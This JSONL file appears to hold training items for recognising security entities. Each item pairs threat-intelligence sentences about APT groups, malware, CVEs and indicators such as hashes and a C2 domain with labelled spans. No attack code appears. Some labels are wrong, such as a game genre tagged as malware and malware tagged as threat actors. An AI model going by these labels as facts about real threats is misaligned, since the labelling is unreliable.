{"text": "FortiGuard Labs has been monitoring a Linux coin mining campaign from \" Rocke \" – a malware threat group specializing in cryptomining . Wild Neutron 's targeting of major IT companies , spyware developers ( FlexiSPY ) , jihadist forums ( the \" Ansar Al-Mujahideen English Forum \" ) and Bitcoin companies indicate a flexible yet unusual mindset and interests .", "spans": {"ORGANIZATION: FortiGuard Labs": [[0, 15]], "THREAT_ACTOR: Wild Neutron": [[136, 148]], "ORGANIZATION: IT companies": [[171, 183]], "ORGANIZATION: spyware developers": [[186, 204]], "ORGANIZATION: FlexiSPY": [[207, 215]], "ORGANIZATION: jihadist forums": [[220, 235]], "ORGANIZATION: Ansar Al-Mujahideen English Forum": [[244, 277]], "ORGANIZATION: Bitcoin companies": [[286, 303]]}, "info": {"id": "cyberner_stix_train_007964", "source": "cyberner_stix_train"}}
{"text": "The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . In October 2017 , a DHS advisory documented ALLANITE technical operations combined with activity with a group .", "spans": {"VULNERABILITY: CVE-2012-0773": [[4, 17]], "ORGANIZATION: DHS": [[104, 107]]}, "info": {"id": "cyberner_stix_train_007965", "source": "cyberner_stix_train"}}
{"text": "Both OnionDuke and MiniDuke also use date-based algorithms to generate Twitter account names and then searched for any tweets from those accounts that linked to image files .", "spans": {"MALWARE: OnionDuke": [[5, 14]], "MALWARE: MiniDuke": [[19, 27]], "TOOL: Twitter": [[71, 78]]}, "info": {"id": "cyberner_stix_train_007966", "source": "cyberner_stix_train"}}
{"text": "We named this campaign “ Bouncing Golf ” based on the malware ’ s code in the package named “ golf. ” The malware involved , which Trend Micro detects as AndroidOS_GolfSpy.HRX , is notable for its wide range of cyberespionage capabilities . Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary . The Task Scheduler service names the tasks , so subsequent tasks are named At2 , At3 , and so on . The companies infected by the malware primarily market so - called massively multiplayer online role - playing games .", "spans": {"MALWARE: Bouncing Golf": [[25, 38]], "ORGANIZATION: Trend Micro": [[131, 142]], "MALWARE: AndroidOS_GolfSpy.HRX": [[154, 175]], "ORGANIZATION: CrowdStrike": [[307, 318]], "MALWARE: malware": [[587, 594]], "MALWARE: massively multiplayer online role - playing games": [[624, 673]]}, "info": {"id": "cyberner_stix_train_007967", "source": "cyberner_stix_train"}}
{"text": "Suckfly delivered Nidiran through a strategic web compromise .", "spans": {"THREAT_ACTOR: Suckfly": [[0, 7]], "MALWARE: Nidiran": [[18, 25]]}, "info": {"id": "cyberner_stix_train_007968", "source": "cyberner_stix_train"}}
{"text": "DLL hijacking techniques have been seen in the past with the APT15 group . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B .", "spans": {"THREAT_ACTOR: APT15 group": [[61, 72]], "FILEPATH: XAgent": [[89, 95]], "FILEPATH: IOS_XAGENT.A": [[108, 120]], "FILEPATH: MadCap": [[180, 186]], "FILEPATH: XAGENT.B": [[204, 212]]}, "info": {"id": "cyberner_stix_train_007969", "source": "cyberner_stix_train"}}
{"text": "The malware starts communicating with the C&C server by sending basic information about the infected machine . The following archive caught our attention for exploiting a WinRAR unacev2 module vulnerability and for having interesting content .", "spans": {"MALWARE: malware": [[4, 11]], "FILEPATH: archive": [[125, 132]], "TOOL: WinRAR": [[171, 177]], "VULNERABILITY: vulnerability": [[193, 206]]}, "info": {"id": "cyberner_stix_train_007970", "source": "cyberner_stix_train"}}
{"text": "For instance , its JHUHUGIT implant was delivered through a Flash zero-day and used a Windows EoP exploit to break out of the sandbox .", "spans": {"MALWARE: JHUHUGIT": [[19, 27]], "TOOL: Flash": [[60, 65]], "VULNERABILITY: zero-day": [[66, 74]], "SYSTEM: Windows": [[86, 93]], "TOOL: EoP": [[94, 97]]}, "info": {"id": "cyberner_stix_train_007971", "source": "cyberner_stix_train"}}
{"text": "The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The Intercept reported that there exists a 2011 presentation by Canada 's Communication Security Establishment ( CSE ) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced .", "spans": {"THREAT_ACTOR: Sofacy group": [[4, 16]], "VULNERABILITY: Flash exploits": [[60, 74]], "TOOL: Carberp": [[92, 99]], "TOOL: JHUHUGIT downloaders": [[106, 126]], "ORGANIZATION: Canada 's Communication Security Establishment": [[223, 269]], "ORGANIZATION: CSE": [[272, 275]], "THREAT_ACTOR: Turla": [[311, 316]]}, "info": {"id": "cyberner_stix_train_007973", "source": "cyberner_stix_train"}}
{"text": "These domains have been registered by the attackers since 2015 . We assume that RunPow stands for run PowerShell , ” and triggers the PowerShell code embedded inside the .dll file . Strong circumstantial evidence suggests Cleaver is linked to Threat Group 2889 ( TG-2889 ) .", "spans": {"MALWARE: PowerShell": [[102, 112]], "MALWARE: .dll file": [[170, 179]], "THREAT_ACTOR: Cleaver": [[222, 229]], "THREAT_ACTOR: Threat Group 2889": [[243, 260]], "THREAT_ACTOR: TG-2889": [[263, 270]]}, "info": {"id": "cyberner_stix_train_007974", "source": "cyberner_stix_train"}}
{"text": "EventBot Randomized package name Randomized package name instead of com.example.eventbot . The SDK , named SWAnalytics is integrated into seemingly innocent Android applications published on major 3rd party Chinese app stores such as Tencent MyApp , Wandoujia , Huawei App Store , and Xiaomi App Store . The group has repeatedly used social media , particularly LinkedIn , to identify and interact with employees at targeted organizations , and then used weaponized Excel documents to deliver RATs such as PupyRAT .", "spans": {"MALWARE: EventBot": [[0, 8]], "TOOL: SDK": [[95, 98]], "MALWARE: SWAnalytics": [[107, 118]], "ORGANIZATION: Tencent MyApp": [[234, 247]], "ORGANIZATION: Wandoujia": [[250, 259]], "ORGANIZATION: Huawei App Store": [[262, 278]], "ORGANIZATION: Xiaomi App Store": [[285, 301]], "ORGANIZATION: social media": [[334, 346]], "MALWARE: RATs": [[493, 497]], "MALWARE: PupyRAT": [[506, 513]]}, "info": {"id": "cyberner_stix_train_007975", "source": "cyberner_stix_train"}}
{"text": "The placement of the decoy functionality is likely designed to confuse the malware researchers . We expect the damage caused by these groups to intensify and the attacks to extend into other regions that are also linked to the complicated Palestinian situation . The initial request , referred to as the helo/hello request in the Nmap script , is comprised of four DWORDs .", "spans": {"THREAT_ACTOR: attacks": [[162, 169]], "ORGANIZATION: complicated Palestinian situation": [[227, 260]], "TOOL: Nmap": [[330, 334]], "TOOL: DWORDs": [[365, 371]]}, "info": {"id": "cyberner_stix_train_007976", "source": "cyberner_stix_train"}}
{"text": "With Cybereason Mobile , our customers can protect against modern threats across traditional and mobile endpoints , all within a single console . The Word document usually exploits CVE-2012-0158 . This , in turn , would provide access to a larger amount of intellectual property and sensitive data .", "spans": {"SYSTEM: Cybereason Mobile": [[5, 22]], "MALWARE: Word document": [[150, 163]], "VULNERABILITY: CVE-2012-0158": [[181, 194]]}, "info": {"id": "cyberner_stix_train_007977", "source": "cyberner_stix_train"}}
{"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": {"MALWARE: st07383.en17.docx": [[12, 29]], "VULNERABILITY: CVE-2017-0001": [[80, 93]], "MALWARE: SHIRIME": [[199, 206]], "FILEPATH: bot": [[214, 217]]}, "info": {"id": "cyberner_stix_train_007978", "source": "cyberner_stix_train"}}
{"text": "We do not know whether the Dukes compiled the components themselves or whether someone else compiled the components before handing them to the group .", "spans": {"THREAT_ACTOR: Dukes": [[27, 32]]}, "info": {"id": "cyberner_stix_train_007979", "source": "cyberner_stix_train"}}
{"text": "The Windows version of UnionCryptoTrader updater ( 629b9de3e4b84b4a0aa605a3e9471b31 ) has similar functionality to the macOS version .", "spans": {"SYSTEM: Windows": [[4, 11]], "TOOL: UnionCryptoTrader": [[23, 40]], "FILEPATH: 629b9de3e4b84b4a0aa605a3e9471b31": [[51, 83]], "SYSTEM: macOS": [[119, 124]]}, "info": {"id": "cyberner_stix_train_007980", "source": "cyberner_stix_train"}}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "FILEPATH: botnet encompassed": [[152, 170]], "ORGANIZATION: financial institutions": [[245, 267]]}, "info": {"id": "cyberner_stix_train_007981", "source": "cyberner_stix_train"}}
{"text": "Figure 1 . ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania . The spear phishing campaigns were remarkably sophisticated from a social engineering perspective . Digital certificates stolen in some of the heists have been used to sign malware that targeted Tibetan and Uyghur activists .", "spans": {"THREAT_ACTOR: ScarCruft": [[11, 20]], "SYSTEM: Digital certificates": [[250, 270]], "ORGANIZATION: Tibetan and Uyghur activists": [[345, 373]]}, "info": {"id": "cyberner_stix_train_007982", "source": "cyberner_stix_train"}}
{"text": "Whitefly compromises its victims using custom malware alongside open-source hacking tools and living off the land tactics , such as malicious PowerShell scripts . To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion .", "spans": {"THREAT_ACTOR: Whitefly": [[0, 8]], "TOOL: PowerShell scripts": [[142, 160]], "THREAT_ACTOR: Rocke": [[215, 220]], "VULNERABILITY: vulnerabilities": [[236, 251]], "TOOL: Oracle WebLogic": [[273, 288]], "TOOL: Adobe ColdFusion": [[295, 311]]}, "info": {"id": "cyberner_stix_train_007983", "source": "cyberner_stix_train"}}
{"text": "It checks whether it is being run in an emulator before it starts its malicious activity . The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory . At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called “ CopyPaste ” from a previously unknown APT . As an example , we took the twitter login page , which implemented the following CSP rule ( which contains ): The following short JS code inserted into the site will send the credentials to google - analytics console controlled by us : The UA-#######- # parameter is the tag ID owner that Google Analytics uses to connect the data to a specific account .", "spans": {"ORGANIZATION: financial institutions": [[202, 224]], "THREAT_ACTOR: FIN7": [[310, 314]], "THREAT_ACTOR: CopyPaste": [[402, 411]], "SYSTEM: CSP": [[527, 530]], "SYSTEM: Google Analytics": [[735, 751]]}, "info": {"id": "cyberner_stix_train_007984", "source": "cyberner_stix_train"}}
{"text": "RCSession C2 server : toshibadrive.com .", "spans": {"MALWARE: RCSession": [[0, 9]], "TOOL: C2": [[10, 12]], "DOMAIN: toshibadrive.com": [[22, 38]]}, "info": {"id": "cyberner_stix_train_007985", "source": "cyberner_stix_train"}}
{"text": "Internal name : snd.dll File format : PE32 DLL MD5: 8c4d896957c36ec4abeb07b2802268b9 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.24 12:07:27 ( GMT ) Exported functions :", "spans": {"FILEPATH: snd.dll": [[16, 23]], "TOOL: DLL": [[43, 46]], "FILEPATH: 8c4d896957c36ec4abeb07b2802268b9": [[52, 84]], "ORGANIZATION: Microsoft": [[109, 118]], "TOOL: Visual Studio": [[119, 132]], "TOOL: GMT": [[174, 177]]}, "info": {"id": "cyberner_stix_train_007986", "source": "cyberner_stix_train"}}
{"text": "All that is needed is to get the original size of the DEX file and read everything that comes after this offset . The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story . Detecting malicious code hidden using this method is not trivial , so process hollowing has become a prevalent technique used by malware today . Following a successful infection , callbacks are made to the RAT 's command and control server at 94.158.247[.]27 .", "spans": {"VULNERABILITY: CVE-2012-0773": [[118, 131]], "TOOL: process hollowing": [[268, 285]], "SYSTEM: control server": [[423, 437]]}, "info": {"id": "cyberner_stix_train_007987", "source": "cyberner_stix_train"}}
{"text": "With mobile devices increasingly used in the corporate environment , thanks to the popularity of BYOD policies , this malware has the potential to cause serious harm , mostly to consumers , and businesses that allow the installation of unsigned applications . In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message . However , recent data seems to indicate that the attacks have continued without significant drawbacks . The problem is that CSP does n't support query strings ( See Spec ):", "spans": {"THREAT_ACTOR: Sima": [[278, 282]], "SYSTEM: CSP": [[626, 629]]}, "info": {"id": "cyberner_stix_train_007988", "source": "cyberner_stix_train"}}
{"text": "In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched . The malicious loader will use dynamic-link library ( DLL ) hijacking — injecting malicious code into a process of a file/application — on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": {"THREAT_ACTOR: group": [[37, 42]], "VULNERABILITY: CVE-2016-4117": [[101, 114]], "TOOL: dynamic-link library": [[238, 258]], "TOOL: DLL": [[261, 264]], "FILEPATH: sidebar.exe": [[346, 357]], "FILEPATH: dllhost.exe": [[369, 380]]}, "info": {"id": "cyberner_stix_train_007989", "source": "cyberner_stix_train"}}
{"text": "Because a user interacting with an ad often leads to a higher chance of the user purchasing something , ad networks often \" pay per click '' to developers who host their ads . WildFire correctly classifies NetTraveler as malicious . This tactic is not without precedent ; in 2013 , the New York Times revealed it had been the target of China based actors shortly after it reported on the alleged mass accumulation of wealth by then-Prime Minister Wen Jiabao and his family . Several Democratic lawmakers released a report last week that accused TaxAct , H&R Block and TaxSlayer of embedding Meta and Google ’s tracking pixels on their sites , potentially violating U.S. law and sharing taxpayers ’ information with those companies .", "spans": {"ORGANIZATION: WildFire": [[176, 184]], "TOOL: NetTraveler": [[206, 217]], "ORGANIZATION: New York Times": [[286, 300]], "ORGANIZATION: Democratic lawmakers": [[483, 503]], "ORGANIZATION: TaxAct": [[545, 551]], "ORGANIZATION: H&R Block": [[554, 563]], "SYSTEM: TaxSlayer": [[568, 577]], "ORGANIZATION: Meta": [[591, 595]], "ORGANIZATION: Google ’s tracking pixels": [[600, 625]], "SYSTEM: sites": [[635, 640]]}, "info": {"id": "cyberner_stix_train_007990", "source": "cyberner_stix_train"}}
{"text": "1 Fadi Alsalamin scandal with an Israeli officer - exclusive - watched before the deletion - Fadi Elsalameen The details of the assassination of President Arafat_06-12-2016_docx Quds.rar Many of these executables are associated with various short links created using Bit.ly , a URL shortening service . Similar to our approach with Symantec 's report on Hidden Lynx , we used Recorded Future to organize the technical details about the DeputyDog attacks to reveal technical information described in the open source reporting across multiple campaigns . In lieu of manually editing an HTML file on a hop point , we have also observed APT1 intruders uploading new ( already-edited ) HTML files . Lesser - known threat actors want to piggyback off having a big name associated with them , like DarkSide , to intimidate their actors or lend more credence to the effectiveness of their threats .", "spans": {"SYSTEM: Bit.ly": [[267, 273]], "ORGANIZATION: Symantec": [[332, 340]], "TOOL: HTML": [[584, 588], [681, 685]], "THREAT_ACTOR: APT1": [[633, 637]], "THREAT_ACTOR: Lesser - known threat actors": [[694, 722]], "MALWARE: DarkSide": [[791, 799]]}, "info": {"id": "cyberner_stix_train_007991", "source": "cyberner_stix_train"}}
{"text": "Most of these commands are related to gathering information from the infected machine ( number of CPU cores , users , scheduled tasks , running processes , OS installed , and CPU and memory information ) via the dota3 payload , as well as changing the password to a random string also stored in /tmp/up.txt .", "spans": {"TOOL: CPU": [[98, 101], [175, 178]], "TOOL: dota3": [[212, 217]], "FILEPATH: /tmp/up.txt": [[295, 306]]}, "info": {"id": "cyberner_stix_train_007992", "source": "cyberner_stix_train"}}
{"text": "After building an initial rapport with targets , the actors behind these social media accounts would instruct victims to install an additional app for easier communication . It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe . A new service is then created using the service parser function ProcessScCommand . None Read about adversaries tracked by CrowdStrike in 2021 in the and in the • None Learn more about how can help your organization prepare to defend against sophisticated threats , respond and recover from incidents with speed and precision , and fortify your cybersecurity practices .", "spans": {"ORGANIZATION: CrowdStrike": [[437, 448]]}, "info": {"id": "cyberner_stix_train_007993", "source": "cyberner_stix_train"}}
{"text": "] com/gate_cb8a5aea1ab302f0_c online 185.158.248 [ . The Trojan is quite similar to the .NET RocketMan Trojan and can handle the same commands; additionally , it includes the #screen” command to take a screenshot . A paper from FireEye in 2013 on several campaigns using PIVY included menuPass as one of them .", "spans": {"MALWARE: Trojan": [[57, 63]], "MALWARE: .NET RocketMan Trojan": [[88, 109]], "ORGANIZATION: FireEye": [[228, 235]], "MALWARE: PIVY": [[271, 275]]}, "info": {"id": "cyberner_stix_train_007994", "source": "cyberner_stix_train"}}
{"text": "FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL’s Kalignite multivendor ATM platform . In 2015 , the Metel gang began to target banks and financial institutions directly .", "spans": {"ORGANIZATION: FireEye": [[0, 7]], "MALWARE: Ploutus": [[68, 75]], "MALWARE: Ploutus-D": [[85, 94]], "ORGANIZATION: banks": [[201, 206]], "ORGANIZATION: financial institutions": [[211, 233]]}, "info": {"id": "cyberner_stix_train_007995", "source": "cyberner_stix_train"}}
{"text": "Command & Control Communication The C2 communication of Zyklon is proxied through the Tor network . For example , DeltaAlfa specifies a DDoS bot family identified as Alfa .", "spans": {"THREAT_ACTOR: Zyklon": [[56, 62]], "TOOL: Tor network": [[86, 97]], "FILEPATH: DeltaAlfa": [[114, 123]], "MALWARE: DDoS bot": [[136, 144]]}, "info": {"id": "cyberner_stix_train_007997", "source": "cyberner_stix_train"}}
{"text": "This technique enables the malware to efficiently run while evading unpacking techniques from the AntiVirus-integrated UPX library .", "spans": {}, "info": {"id": "cyberner_stix_train_007998", "source": "cyberner_stix_train"}}
{"text": "Our first observation of an attempted attack related to this campaign dates back to November 2015 , although Symantec telemetry data indicates that the campaign may have already existed in early 2015 or perhaps even earlier . Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 .", "spans": {"ORGANIZATION: Symantec": [[109, 117]]}, "info": {"id": "cyberner_stix_train_007999", "source": "cyberner_stix_train"}}
{"text": "In our analysis , we distinguish between two separate campaigns happening simultaneously .", "spans": {}, "info": {"id": "cyberner_stix_train_008000", "source": "cyberner_stix_train"}}
{"text": "Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns .", "spans": {"THREAT_ACTOR: Gorgon": [[0, 6]], "THREAT_ACTOR: actor": [[145, 150]], "MALWARE: Panda Banker": [[165, 177]], "ORGANIZATION: Arbor": [[242, 247]], "FILEPATH: Panda Banker": [[318, 330]]}, "info": {"id": "cyberner_stix_train_008001", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : 5e5ea1a67c2538dbc01df28e4ea87472 .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "FILEPATH: 5e5ea1a67c2538dbc01df28e4ea87472": [[11, 43]]}, "info": {"id": "cyberner_stix_train_008002", "source": "cyberner_stix_train"}}
{"text": "Once executed , Vcrodat loads an encrypted payload on to the victim 's computer . Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1) , and executing it using ShellExecute() .", "spans": {"TOOL: Vcrodat": [[16, 23]], "VULNERABILITY: CVE-2017-10271": [[192, 206]], "MALWARE: PowerShell": [[220, 230]]}, "info": {"id": "cyberner_stix_train_008003", "source": "cyberner_stix_train"}}
{"text": "The threat actor Rocke was first reported by Cisco Talos in late July 2018 . During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum .", "spans": {"ORGANIZATION: Cisco Talos": [[45, 56]]}, "info": {"id": "cyberner_stix_train_008004", "source": "cyberner_stix_train"}}
{"text": "However , we have not seen Bart since , suggesting that this was either an experiment or that the ransomware did not function as expected for TA505 .", "spans": {"MALWARE: Bart": [[27, 31]], "THREAT_ACTOR: TA505": [[142, 147]]}, "info": {"id": "cyberner_stix_train_008005", "source": "cyberner_stix_train"}}
{"text": "TA505 introduced Jaff ransomware in May 2017 .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Jaff": [[17, 21]]}, "info": {"id": "cyberner_stix_train_008006", "source": "cyberner_stix_train"}}
{"text": "Attackers are sending malicious PDF and DOC files , which use exploits to drop variants of Backdoor.Sogu .", "spans": {"TOOL: PDF": [[32, 35]], "TOOL: DOC": [[40, 43]], "FILEPATH: Backdoor.Sogu": [[91, 104]]}, "info": {"id": "cyberner_stix_train_008007", "source": "cyberner_stix_train"}}
{"text": "While accessing the domain from a browser you get a login page very similar to other malware panels . The backdoors Lazarus are deploying are difficult to detect and a significant threat to the privacy and security of enterprises , allowing attackers to steal information , delete files , install malware , and more . Proofpoint is tracking this attacker , believed to operate out of China , as TA459 .", "spans": {"THREAT_ACTOR: Lazarus": [[116, 123]], "ORGANIZATION: enterprises": [[218, 229]], "THREAT_ACTOR: attackers": [[241, 250]], "ORGANIZATION: Proofpoint": [[318, 328]], "THREAT_ACTOR: TA459": [[395, 400]]}, "info": {"id": "cyberner_stix_train_008008", "source": "cyberner_stix_train"}}
{"text": "We can compare it to the sample e338d49c270baf64363879e5eecb8fa6bdde8ad9 used in May 2017 by Group 74 .", "spans": {"FILEPATH: e338d49c270baf64363879e5eecb8fa6bdde8ad9": [[32, 72]], "THREAT_ACTOR: Group 74": [[93, 101]]}, "info": {"id": "cyberner_stix_train_008009", "source": "cyberner_stix_train"}}
{"text": "NEWMSG – write an SMS to the device memory containing the text and sender number sent from C & C . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . The EternalBlue exploits from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 .", "spans": {"MALWARE: Backdoor.Nidiran": [[208, 224]], "VULNERABILITY: EternalBlue": [[331, 342]], "VULNERABILITY: exploits": [[343, 351]], "MALWARE: Petya": [[465, 470]], "MALWARE: NotPetya": [[473, 481]]}, "info": {"id": "cyberner_stix_train_008010", "source": "cyberner_stix_train"}}
{"text": "c0cfd462ab21f6798e962515ac0c15a92036edd3e2e63639263bf2fd2a10c184 d791e0ce494104e2ae0092bb4adc398ce740fef28fa2280840ae7f61d4734514 38dcec47e2f4471b032a8872ca695044ddf0c61b9e8d37274147158f689d65b9 27cea60e23b0f62b4b131da29fdda916bc4539c34bb142fb6d3f8bb82380fe4c this SWC was used to specifically target Turkish goverment . XGen security also powers Trend Micro ’s suite of security solutions : Hybrid Cloud Security and User Protection . We initially tracked this activity as UNC3810 before merging the cluster with Sandworm .", "spans": {"TOOL: SWC": [[265, 268]], "ORGANIZATION: XGen": [[321, 325]], "ORGANIZATION: Trend Micro": [[347, 358]], "THREAT_ACTOR: UNC3810": [[474, 481]], "THREAT_ACTOR: Sandworm": [[514, 522]]}, "info": {"id": "cyberner_stix_train_008011", "source": "cyberner_stix_train"}}
{"text": "September 08 , 2020 TikTok Spyware A detailed analysis of spyware masquerading as TikTok A recent threat to ban TikTok in the United States has taken the internet by storm and received mixed reactions from social media and internet users . As with the 2016 series of virtual bank heists , including the Bangladesh Bank heist , FASTCash illustrates that Lazarus possesses an in-depth knowledge of banking systems and transaction processing protocols and has the expertise to leverage that knowledge in order to steal large sums from vulnerable banks . Analysisof these larger convoluted clusters is ongoing .", "spans": {"SYSTEM: TikTok": [[20, 26], [82, 88], [112, 118]], "ORGANIZATION: FASTCash": [[327, 335]], "THREAT_ACTOR: Lazarus": [[353, 360]]}, "info": {"id": "cyberner_stix_train_008013", "source": "cyberner_stix_train"}}
{"text": "Interestingly , the two communication apps described above as being targeted by the HenBox variant listed in Table 3 do not appear in this updated list . APT41 regularly leverages code-signing certificates to sign malware when targeting both gaming and nongaming organizations . The Dukes are known to employ a vast arsenal of malware toolsets , which we identify as MiniDuke , CosmicDuke , OnionDuke , CozyDuke , CloudDuke , SeaDuke , HammerDuke , PinchDuke , and GeminiDuke .", "spans": {"THREAT_ACTOR: APT41": [[154, 159]], "TOOL: code-signing certificates": [[180, 205]], "ORGANIZATION: nongaming organizations": [[253, 276]], "THREAT_ACTOR: Dukes": [[283, 288]], "MALWARE: MiniDuke": [[367, 375]], "MALWARE: CosmicDuke": [[378, 388]], "MALWARE: OnionDuke": [[391, 400]], "MALWARE: CozyDuke": [[403, 411]], "MALWARE: CloudDuke": [[414, 423]], "MALWARE: SeaDuke": [[426, 433]], "MALWARE: HammerDuke": [[436, 446]], "MALWARE: PinchDuke": [[449, 458]], "MALWARE: GeminiDuke": [[465, 475]]}, "info": {"id": "cyberner_stix_train_008014", "source": "cyberner_stix_train"}}
{"text": "In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor .", "spans": {"TOOL: Delphi": [[106, 112]]}, "info": {"id": "cyberner_stix_train_008016", "source": "cyberner_stix_train"}}
{"text": "Gold Lowell responded by modifying a registry entry to disable the endpoint tool 's scanning functionality . The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems .", "spans": {"THREAT_ACTOR: Gold Lowell": [[0, 11]], "FILEPATH: files": [[113, 118]], "VULNERABILITY: exploit": [[119, 126]], "TOOL: Microsoft Office": [[142, 158]], "VULNERABILITY: CVE-2012-0158": [[175, 188]]}, "info": {"id": "cyberner_stix_train_008017", "source": "cyberner_stix_train"}}
{"text": "The attackers ’ final step was to exfiltrate data off the victim ’s network and onto Suckfly ’s infrastructure .", "spans": {"THREAT_ACTOR: Suckfly": [[85, 92]]}, "info": {"id": "cyberner_stix_train_008018", "source": "cyberner_stix_train"}}
{"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]], "VULNERABILITY: EternalBlue exploit": [[46, 65]], "TOOL: open source tool": [[74, 90]], "TOOL: Responder": [[91, 100]], "MALWARE: Gazer": [[214, 219]], "MALWARE: backdoors": [[243, 252]], "THREAT_ACTOR: Turla": [[265, 270]], "THREAT_ACTOR: Carbon": [[285, 291]], "THREAT_ACTOR: Kazuar": [[296, 302]]}, "info": {"id": "cyberner_stix_train_008019", "source": "cyberner_stix_train"}}
{"text": "These attacks against Albanian government institutions by the Sofacy Group were documented and reported by consultancy corporate PwC in December 2014 .", "spans": {"THREAT_ACTOR: Sofacy": [[62, 68]], "ORGANIZATION: PwC": [[129, 132]]}, "info": {"id": "cyberner_stix_train_008020", "source": "cyberner_stix_train"}}
{"text": "About a decade ago , attackers wielding banking Trojans could simply use stolen credentials to access a victim ’ s online banking account and perform money transfers . PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . We also identified another sample of ThreeDollars , created on January 15 , 2017 with the file name strategy preparation.dot .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[168, 180]], "MALWARE: ThreeDollars": [[366, 378]], "FILEPATH: preparation.dot": [[438, 453]]}, "info": {"id": "cyberner_stix_train_008021", "source": "cyberner_stix_train"}}
{"text": "The third type of information will be sent when RuMMS intercepts any SMS messages , including the balance inquiry results when it contacts the SMS code of a particular financial service . Additionally , the scope of organizations targeted by this group has expanded to not only include organizations within Saudi Arabia , but also a company in Qatar and government organizations in Turkey , Israel and the United States . JhoneRAT : Cloud based python RAT targeting Middle Eastern countries . The Twitter handle used by Hack520 indicates also an “ est ” portion .", "spans": {"MALWARE: RuMMS": [[48, 53]], "THREAT_ACTOR: group": [[247, 252]], "ORGANIZATION: government organizations": [[354, 378]], "MALWARE: JhoneRAT": [[422, 430]], "TOOL: python": [[445, 451]], "TOOL: RAT": [[452, 455]], "ORGANIZATION: Hack520": [[520, 527]]}, "info": {"id": "cyberner_stix_train_008022", "source": "cyberner_stix_train"}}
{"text": "Despite broad scrutiny and reports on MuddyWater attacks , the activity continues with only incremental changes to the tools and techniques .", "spans": {"THREAT_ACTOR: MuddyWater": [[38, 48]]}, "info": {"id": "cyberner_stix_train_008023", "source": "cyberner_stix_train"}}
{"text": "In addition to the Mimikatz tool , the actor uploaded other tools to the webshell hosted at this second organization . es.exe : Mimikatz with custom loader , da53dcaeede03413ba02802c4be10883c4c28d3d28dee11734f048b90eb3d304 .", "spans": {"TOOL: Mimikatz": [[19, 27], [128, 136]], "FILEPATH: es.exe": [[119, 125]], "FILEPATH: da53dcaeede03413ba02802c4be10883c4c28d3d28dee11734f048b90eb3d304": [[158, 222]]}, "info": {"id": "cyberner_stix_train_008024", "source": "cyberner_stix_train"}}
{"text": "Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers . According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability .", "spans": {"ORGANIZATION: iSIGHT Partners": [[18, 33]], "ORGANIZATION: customers": [[109, 118]], "ORGANIZATION: security firm": [[138, 151]], "ORGANIZATION: military officials": [[184, 202]], "TOOL: emails": [[222, 228]], "TOOL: Adobe Reader": [[274, 286]], "VULNERABILITY: vulnerability": [[287, 300]]}, "info": {"id": "cyberner_stix_train_008025", "source": "cyberner_stix_train"}}
